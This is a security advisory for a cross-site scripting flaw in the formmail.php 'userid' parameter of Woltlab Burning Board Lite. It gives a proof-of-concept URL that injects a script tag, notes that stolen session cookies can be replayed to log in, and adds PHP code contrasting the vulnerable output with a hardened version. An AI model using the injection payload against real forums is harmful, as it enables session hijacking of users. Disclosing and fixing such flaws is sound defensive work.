
Security Advisory: Woltlab Burning Board Lite formmail.php XSS

Advisory Information

Advisory name       : Woltlab Burning Board Lite formmail.php XSS
Discovered by       : drhankey /
Vendor Name         : Woltlab
Vendor Homepage     :
Software            : Woltlab Burning Board Lite
Vulnerability Type  : Cross-Site Scripting
Vulnerable Versions : 1.0.0, 1.0.1e, maybe more
Platforms           : OS Independent, PHP

What is Woltlab Burning Board Lite?

Woltlab Burning Board Lite is the free version of the Woltlab Burning Board, a PHP-based bulletin board.

Vulnerability Description:

formmail.php outputs the "userid" parameter unfiltered, so it is possible to inject arbitrary HTML or script into the page output by using a crafted link.

The board also allows logging in with stolen cookies, so a session cookie obtained through this injection can be replayed.

Proof of Concept:

http://website/board/formmail.php?userid=1"><script>document.location.href=""; x="y
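Added example, not Woltlab's code: a stand-in for the unfiltered output described above, beside a hardened version that validates userid as an integer and HTML-encodes it on output, plus HttpOnly session cookies so a script injected this way cannot read the session cookie. The form markup, the parameter handling and the cookie settings are assumptions.

```php
<?php
// Vulnerable pattern (stand-in, not the original formmail.php): the userid
// parameter is written into an attribute as-is. A value such as
//   1"><script>...
// closes the value attribute and the <input> tag, so the rest is rendered
// as markup and the script runs in the page's origin.
function render_form_vulnerable(string $userid): string {
    return '<input type="hidden" name="userid" value="' . $userid . '">';
}

// Hardened pattern: userid is a numeric id, so anything that is not a
// positive integer is rejected before it reaches the output. Even the
// validated value is encoded on output; ENT_QUOTES escapes both " and ',
// which is what an attribute context needs.
function render_form_hardened(string $userid): string {
    if (!ctype_digit($userid) || (int)$userid < 1) {
        http_response_code(400);
        return 'Invalid user id.';
    }
    $safe = htmlspecialchars($userid, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="userid" value="' . $safe . '">';
}

// Session cookie hardening, addressing the stolen-cookie point: HttpOnly
// keeps the cookie out of document.cookie, so injected script cannot read
// it; Secure and SameSite narrow where the cookie is sent. This does not
// by itself stop replay of a cookie obtained some other way, which needs
// server-side session binding or expiry. (Array form needs PHP 7.3+.)
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,
    'samesite' => 'Lax',
]);
session_start();

// Assumed entry point: read the parameter and render the hardened form.
$userid = $_GET['userid'] ?? '';
echo render_form_hardened($userid);
```

Feeding the proof-of-concept value above into render_form_hardened() returns the 400 response instead of markup, and a plain value such as "1" comes back inside the attribute unchanged.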
